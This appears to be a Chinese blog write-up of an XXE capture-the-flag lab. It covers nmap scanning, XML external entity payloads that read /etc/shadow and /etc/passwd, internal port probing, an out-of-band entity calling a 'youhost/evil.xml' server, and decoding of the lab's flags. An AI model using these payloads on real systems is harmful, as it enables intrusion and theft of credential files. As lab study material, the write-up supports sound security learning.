xxe靶機

原創 shy014 2020-06-17 04:08

開始之前先回憶一下nmap

一直都知道nmap功能很強大,但是平時工作中就只用來掃描端口,漸漸的都忘記了其它的功能及使用方法,正好今天做靶場需要用nmap進行存活主機發現,總結下nmap的使用方法。

場景一:主機發現

nmap -sP 192.168.44.0/24    使用ping命令來發現存活主機

場景二:端口掃描

nmap -v -sV -p- 192.168.44.138 

再學習一下xxe

DTD是XML的構建模塊。一般都是在XML文件內部聲明,但是也可以外部引用,外部引用這就容易出問題了。

引用外部DTD的格式

<!DOCTYPE 根元素 SYSTEM "文件名">

<?DOCTYPE 根元素 PUBLIC "public_ID""文件名">

引用外部實體

<!ENTITY 實體名稱 SYSTEM "URI">

<!ENTITY 實體名稱 PUBLIC "public_ID""URI">

XML外部實體注入(XML External Entity)

當允許引用外部實體時,通過惡意構造,可導致

1,任意文件讀取

<!DOCTYPE example [<!ENTITY xxe SYSTEM "file:///etc/shadow">]>

<root>&xxe;</root>

 

2,執行系統命令

3,探測內網端口

http://192.168.0.145:65412/?xml=<!DOCTYPEexample [<!ENTITY xxe SYSTEM"http%3A%2f%2f192.168.0.145%3A22%2f123">]><root>%26xxe%3B<%2Froot>

4,攻擊內網網站

但是不同的程序支持的協議不一樣,可以利用這些僞協議完成上述的利用:

libxml2:file http ftp

php:file http ftp php compress.zlib compress.bzip2 data glob phar

java:http https ftp file jar netdoc mailto gopher *

.NET:file http https ftp

挖掘流程:

1,檢測XML是否會被解析

[html] view plain copy

<?xml version=”1.0” encoding=”UTF-8”?> 
<!DOCTYPE ANY [  
<!ENTITY test “this is test”> 
]>

<root>&test;</root>

如果$test;變成了”this is test”,那就繼續第二步。

(2)檢測服務器是否支持外部實體:

[html] view plain copy

1. <?xml version=”1.0” encoding=”UTF-8”?> 
2.   <!DOCTYPE ANY [  
3.   <!ENTITY % shit SYSTEM “http://youhost/evil.xml”> 
4.   %shit;  
5.   ]>

通過查看自己服務器上的日誌來判斷,看目標服務器是否向你的服務器發了一條請求evil.xml的HTTP request。

(3)如果上面兩步都支持,那麼就看能否回顯。如果能回顯,就可以直接使用外部實體的方式進行攻擊。當然有時候服務器會不支持一般實體的引用,也就是在DTD之外無法引用實體,如果這樣的話,只能使用Blind XXE攻擊。

(4)如果不能回顯,毫無疑問,使用Blind XXE攻擊方法。

3,發現開啓80端口

4,使用dirsearch進行目錄掃描

5,訪問robots.txt

6,

7,抓包發現了有意思的東西

8,發現可以利用

<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE r [
            <!ELEMENT r ANY >
            <!ENTITY admin SYSTEM "file:///etc/passwd">
             ]>
<root><name>&admin;</name><password>admin123</password></root>

base64解密之後,發現用戶名和密碼存在源碼當中,MD5解密,發現用戶名爲admin@123

<?php
   session_start();
?>


<html lang = "en">
   
   <head>
      <title>admin</title>
      <link href = "css/bootstrap.min.css" rel = "stylesheet">
      
     
      
   </head>
    
   <body>
      
      <h2>Enter Username and Password</h2> 
      <div class = "container form-signin">
         
         <?php
            $msg = '';
            if (isset($_POST['login']) && !empty($_POST['username']) 
               && !empty($_POST['password'])) {
                
               if ($_POST['username'] == 'administhebest' && 
                  md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
                  $_SESSION['valid'] = true;
                  $_SESSION['timeout'] = time();
                  $_SESSION['username'] = 'administhebest';
                  
                echo "You have entered valid use name and password <br />";
        $flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
        echo $flag;
               }else {
                  $msg = 'Maybe Later';
               }
            }
         ?>
      </div> <!-- W00t/W00t -->
      
      <div class = "container">
      
         <form class = "form-signin" role = "form" 
            action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']); 
            ?>" method = "post">
            <h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
            <input type = "text" class = "form-control" 
               name = "username" 
               required autofocus></br>
            <input type = "password" class = "form-control"
               name = "password" required>
            <button class = "btn btn-lg btn-primary btn-block" type = "submit" 
               name = "login">Login</button>
         </form>
            
         Click here to clean <a href = "adminlog.php" tite = "Logout">Session.
         
      </div> 
      
   </body>
</html>

使用admin.php當中發現的用戶和密碼進行登錄

點擊紅色的Flag跳轉到404

一猜就知道在xxe目錄下

發現很多靶場都要有一個文件包含、文件讀取漏洞,必須得讀源碼纔可以,不然就很難做下去,還可以鍛鍊一下自己的代碼審計能力。

所以,使用xxe讀取flagmeout.php文件

base64解密發現第一個flag

 

看着這個flag應該也是編碼了,百度下,發現是base32編碼

我去,再進行base64解碼吧

繼續讀取/etc/.flag.php源碼,base64解碼得

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);
這是個啥,很像以前做過的一個靶場中的ook編碼

先百度一下,發現是PHP代碼,加上標識符<?php  ?>,找個在線運行PHP代碼的環境,運行一下就能得到

到此靶場完成。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

編程語言中,取餘和取模的區別

取餘,遵循儘可能讓商向0靠近的原則 取模,遵循儘可能讓商向負無窮靠近的原則 在matlab中,關於取餘和取模是這麼定義的: 當y≠0時: 取餘:rem(x,y)=x-y.*fix(x./y) 取模:mod(x,y)=x-y.*fl

network_dream 2020-07-07 03:32:11

【精】18款在線網頁SVG編輯器

整理自網絡,閒時收藏,忙時救命 目錄 1.SVG-edit 2.macSVG 3.Method Draw 4.Clker SVG-edit 5.Vector Paint SVG Editor 6.Vectr 7.Inkscape 8.Bo

良心有约 2020-07-06 21:11:22

Excel製作一個家庭收支明細表

下載鏈接:http://www.greenxf.com/soft/211649.html 通過Excel可以製作一個家庭收支明細表,下載鏈接如上鍊接所示,可以免費下載。 可通過個人情況修改固定支出、每日支出的細節,製作成爲個人記賬的明細表

蹦跶的小羊羔 2020-07-05 21:48:29

WinMerge

WinMerge是一款運行於Windows系統下的免費開源的文件比較/合併工具,使用它可以非常方便地比較多個文檔內容甚至是文件夾與文件夾之間的文件差

jason_deng 2020-07-04 14:55:44

單頁面應用的核心

這幾年裏,單頁面應用的框架令人應接不暇,各種新的概念也層出不窮。從過去的 jQuery Mobie、Backbone 到今天的 Angular 2、React、Vue 2,除了版本號不同,他們還有很多的相同之處。 剛開始寫商業代碼

Footloose_ 2020-07-04 02:07:00

MyEclipse 無法啓動

之前用都好好的,但強制關機後,再啓動就直接報錯了,進不了主界面。 問題描述:點擊啓動後,跳出對話框如下: 解決辦法: 1、刪除文件夾(網上找的,沒試過)   D:\workspaces\.metadata\.plugins\org.ec

码农先生 2020-07-03 18:08:06

JAVA HTTP請求

整理了一下經常用到的請求 1. GET public static String sendGet(String httpUrl, Map<String, String> parameter , Map<String , String>

Lossdate 2020-07-03 01:47:04

Unity編輯器Hierarchy擴展中文教程——Chinar圖文詳解

Chinar blog :www.chinar.xin Hierarchy 編輯器擴展詳細說明 本文提供全流程,中文翻譯助力快速掌握編輯器對 Unity Hierarchy 的擴展、及效果展示爲初學者節省寶貴的時間,避

Chinarcsdn 2020-07-02 04:13:54

SVN移庫項目遷移、更換根目錄、移庫完美教程!

Chinar blog :www.chinar.xin SVN項目移庫、遷移服務器 本文提供全流程,中文翻譯助力快速完成 SVN 移庫根目錄爲初學者節省寶貴的時間,避免採坑! Chinar —— 心分享、心創新!

Chinarcsdn 2020-07-02 04:13:49

Unity編輯器類中文教程彙總-Chinar(一個默默無聞分享知識的人)

Chinar blog :www.chinar.xin Unity 編輯器資料彙總 本文提供全流程,中文翻譯統計我所有編輯器 Unity Editor 教程資料,便於查詢學習爲初學者節省寶貴的時間,避免採坑! C

Chinarcsdn 2020-07-02 04:13:49

Git所有問題錯誤解決方案大全(幾乎囊括所有錯誤持續更新-Chinar)

Chinar blog :www.chinar.xin Git問題解決方案大全 本文提供全流程,中文翻譯助力快速利用 Git 命令解決項目庫版本控制問題爲初學者節省寶貴的時間,避免採坑! Chinar —— 心

Chinarcsdn 2020-07-02 04:13:48

深度學習框架的一切收穫(PyTorch、Tensorflow、Gluon)

Pytorch篇: 隨機種子設定 import torch import numpy as np import random import torch.backends.cudnn as cudnn seed = 20 print('r

dbmeng 2020-06-29 10:48:16

Cadence數字電路驗證仿真工具IUS和IES以及xrun仿真環境搭建

                 Cadence數字電路驗證仿真工具IUS和IES      前言:Cadence,有兩大驗證仿真工具。一個是IUS,一個是IES。本文着重介紹ISE,其代表性的工具爲xrun,是數字電路驗證最重要的工具之

gsithxy 2020-06-28 22:09:53

[Verdi]Verdi使用方法技巧總結

                                Verdi使用方法技巧總結          前言:本文主要總結Verdi的常用方法,包擴使用技巧、快捷鍵、dump波形等等。下面着重介紹dump module中的signa

gsithxy 2020-06-28 22:09:53

使用adb時提示Unable to start adb server: error: protocol fault

報錯信息 使用adb push等命令時出現如下報錯: Unable to start adb server: error: protocol fault (couldn’t read status): Connection re

ShadeWin 2020-06-27 10:19:23